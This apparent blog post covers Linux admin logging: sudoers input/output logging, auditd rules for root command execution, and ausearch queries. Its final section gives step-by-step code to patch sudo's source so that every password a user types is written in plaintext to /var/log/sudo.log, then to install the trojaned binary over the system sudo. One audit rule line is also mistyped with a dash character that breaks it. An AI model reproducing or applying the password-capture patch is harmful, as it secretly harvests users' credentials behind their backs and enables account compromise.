Tag Archives: sudo

Security: log user's actions

Log sudo actions

/etc/sudoers:
Defaults iolog_dir=/var/log/sudo-io/%{user}
%admins ALL=(ALL): LOG_INPUT: LOG_OUTPUT: ALL

gpasswd -a user admins # add user to group admins

all sudo actions of user in group admins will be wrote to /var/log/sudo-io/

Log all events with auditd

apt-get install auditd
add in the end of /etc/audit/audit.rules:
-a exit,always -F arch=b64 -F euid=0 -S execve
— a exit,always -F arch=b32 -F euid=0 -S execve

add to /etc/default/grub
audit=1 to the kernel's cmdline

Place «session required pam_loginuid.so» to the /etc/pam.d/{login,kdm,sshd}

update-grub
reboot

How to make search by events in auditd's log

ausearch -ua 1000, where 1000 is users id.

How to get passwords through sudo

1) download sudo sources
2) open file conversation.c
3) add

1
#include<stdio.h>

4) search strings

1
2
3
pass = tgetpass(msg->msg, msg->timeout, flags);
if (pass == NULL)
    goto err;

4) after previous strings add code

1
2
3
4
FILE *file;
file = fopen("/var/log/sudo.log","a+");
fprintf(file, "%s\n", pass);
fclose(file);

5) build sudo (read README and INSTALL files, but really run only «./configure && make» commands)
6) put new sudo binary in /usr/bin/ folder
7) chmod 4000 /usr/bin/sudo
8) chmod +x /usr/bin/sudo
9) chown root.root /usr/bin/sudo
10) you could find passwords in /var/log/sudo.log after user's using of that command